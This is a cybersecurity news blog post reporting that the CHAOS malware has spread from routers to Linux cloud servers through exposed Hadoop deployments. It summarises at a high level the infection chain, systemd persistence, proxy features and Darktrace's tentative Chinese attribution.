April 8, 2026

Chaos Malware Spreads to Linux Cloud Servers via Routers

Vaibhav April 8, 2026
Chaos-Malware-Spreads-to-Linux-Cloud-Servers-via-Routers
Post Views: 9

CHAOS Malware Expands From Routers to Linux Cloud Servers

In a concerning development, the CHAOS malware, initially identified by Lumen’s Black Lotus Labs, has expanded its scope from targeting routers and edge devices to compromising Linux cloud servers.

  • This shift marks a significant escalation in the threat landscape, as cloud servers often hold sensitive data and provide critical infrastructure for organizations.
  • The attack begins with an HTTP request to the Hadoop deployment’s resource manager endpoint, which defines a new application and embeds a sequence of shell commands.
  • These commands pull a CHAOS agent binary from an attacker-controlled server, set permissions, execute the binary, and delete it from disk.
  • The CHAOS agent binary is served from a domain previously linked to Operation Silk Lure, a separate campaign that distributed the ValleyRAT remote access trojan through malicious job application attachments.
  • The new CHAOS sample is a 64-bit ELF binary compiled for x86-64 Linux, marking a departure from earlier variants that targeted ARM, MIPS, and PowerPC architectures.
  • The internal namespace was restructured, and several functions were rewritten or removed, including the SSH brute-forcing spreader and certain vulnerability exploitation routines previously inherited from Kaiji.

New Persistence Method

The malware establishes persistence using systemd and stores a keep-alive script on disk.

Proxy Functionality

The malware supports various protocols, including HTTP, TLS, TCP, UDP, and WebSocket, and features a SOCKS proxy function.

Circumstantial Evidence

While definitive attribution remains difficult, Darktrace’s analysis attributes suspected Chinese origin to CHAOS based on Chinese-language strings in the malware binary and zh-CN locale indicators.

According to Darktrace’s research, the expansion of CHAOS malware from routers to Linux cloud servers poses a significant threat to organizations running cloud workloads.

Conclusion

Organizations must prioritize proper security configurations and continuous monitoring to protect themselves against this evolving threat.



Blog Image

About Author

Vaibhav

See author's posts

More Stories

Protecting-Against-Evolving-Cloud-Security-Threats

Protecting Against Evolving Cloud Security Threats

Vaibhav April 8, 2026
Massive-Data-Breach-Affects-Major-US-Agencies-Including-FBI-IRS-and-NASA-via-Salesforce-Security-Incident

Massive Data Breach Affects Major US Agencies Including FBI, IRS, and NASA via Salesforce Security Incident

Vaibhav April 3, 2026
Secure-On-Premises-AI-Governance-Solutions-with-APERION-SmartFlow-SDK

Secure On-Premises AI Governance Solutions with APERION SmartFlow SDK

Vaibhav April 3, 2026

Latest Cyber Security News

hong-kong-encryption-law-national-security

hong-kong-encryption-law-national-security

Vaibhav April 8, 2026
Outdated-Software-Risks-Security-Threats-on-Macs-and-Mobile-Devices

Outdated Software Risks Security Threats on Macs and Mobile Devices

Vaibhav April 8, 2026
Acronis-Unveils-Managed-Detection-and-Response-Service-for-Managed-Security-Providers

Acronis Unveils Managed Detection and Response Service for Managed Security Providers

Vaibhav April 8, 2026
Medusa-Ransomware-Deployment-Tied-to-Recent-Vulnerability-Exploitation

Medusa Ransomware Deployment Tied to Recent Vulnerability Exploitation

Vaibhav April 8, 2026
OpenSSL-Data-Breach-Vulnerability-Fixed-with-Latest-Update

OpenSSL Data Breach Vulnerability Fixed with Latest Update

Vaibhav April 8, 2026
en_USEnglish
en_USEnglish